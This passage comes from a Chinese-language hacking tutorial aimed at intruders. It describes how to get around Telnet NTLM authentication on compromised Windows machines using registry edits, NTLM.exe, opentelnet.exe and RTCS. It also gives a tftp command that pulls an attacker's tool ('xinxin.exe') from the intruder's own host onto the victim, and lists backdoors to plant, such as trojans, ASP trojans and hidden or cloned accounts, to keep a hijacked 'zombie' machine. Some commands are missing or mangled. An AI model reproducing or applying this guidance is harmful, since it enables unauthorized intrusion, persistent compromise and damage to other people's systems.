2)身份验证选项=1时
|
/先尝试 NTLM 身份验证,假如失败,再使用用户名和密码,其实这种方式对于我们来说,和上一种方式没什么区别
3)身份验证选项=2时
|
/仔细看看上面的显示,根本没有给您输入用户名和密码的机会,直接断开连接,扫到了密码也是白扫
所以对于入侵者来说,NTLM是横在我们面前的一座大山,必须要除掉他,一般我们有如下几种方法:
1、通过修改远程注册表更改telnet服务器配置,将验证方式从2改为1或0;
2、使用NTLM.exe,上传后直接运行,可将telnet服务器验证方式从2改为1;
3、在本地建立扫描到的用户,以此用户身份开启telnet客户机并进行远程登录;
4、使用软件,比如opentelnet.exe(需要管理员权限且开启IPC管道);
5、使用脚本,如RTCS,(需要管理员权限但不依赖IPC管道)。
基本上是以上的5种,其中后两种是我们比较常用的开telnet的手法,而且使用方法十分简单,命令如下:
|
五 在telnet中该做什么
本来写到上面就想结束了,但是许多朋友都说telnet上去后不知道该做什么了,既然这样,那我就抛砖引玉吧,这次不讲具体做法,只是说说思路,什么?为什么不讲具体做法?篇幅不够嘛,以后我会一一解释的。
1 查看系统信息
呵呵,其实就是随处看看,看看他的系统配置和版本(用type c:boot.ini来知道pro版或server版),看看都装了什么服务或软件(从目录名就能够知道了),看看有什么重要或有趣的文档啦(唉,要是外国的机器,看也看不懂),看看他的用户情况,总之就是尽可能多的了解系统,为一会装后门摸底。
2 使用tftp传送文档
想必大家都碰到过在telnet中传输文档的问题,因为我们习惯了在ipc管道中的文档传输,所以有些朋友喜欢用net share ipc$ 来打开管道,进而利用copy来传输文档。但是这样反而麻烦,既然我们已得到了shell,我们能够用TFPT命令来完成这一切,什么是TFTP呢?
用TFTP(Trivial File Transfer Protocol)来实现文档的传送是一种基于UDP连接的文档传输,一般是使用Windows自带的tftp.exe和一个TFTP服务器端软件构成一个完整的传输结构。他是这样使用的: 首先运行本地的TFTP Server(比如tftpd32.exe)软件并确保始终开启直至传输全部完成, 然后在telnet中(当然您也能够在其他shell中)运行下面的命令:
C:>tftp –i ip get xinxin.exe c:abcxinxin.exe
其中ip为您自己机器的ip,且上传文档要和TFTP服务器端在同一目录下,这样您就能够把xinxin.exe上传到c盘abc目录下了(其实是从tftp服务器下载来的)。
需要指出的是,假如使用代理IP,您将不能实现和外部网络的文档传送。因为您的代理网关在进行数据封装的时候会将自己的IP地址加入到您的数据报中,代替您的内部网络地址,所以在外部网络进行MAC寻址时是很难找到您这台TFTP服务器的。
3 安置后门
安置后门放在第二步似乎早了点,假如您入侵更有其他目的,比如以破坏为主,或是来修改主页的,那么这些事情当然能够在安置后门之前做;假如您只是想得到一只肉鸡,那就没什么可说的了,安后门吧。
后门的种类繁多,也给我们提供了很大的选择余地,能够根据具体情况选择合适的后门的确是一门学问。常用的后门一般有:木马,asp木马,远程控制软件,克隆帐户,建立并隐藏帐户,telnet,telnet扩展的shell,终端服务等。安置一个好的后门通常要注意以下几点:
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
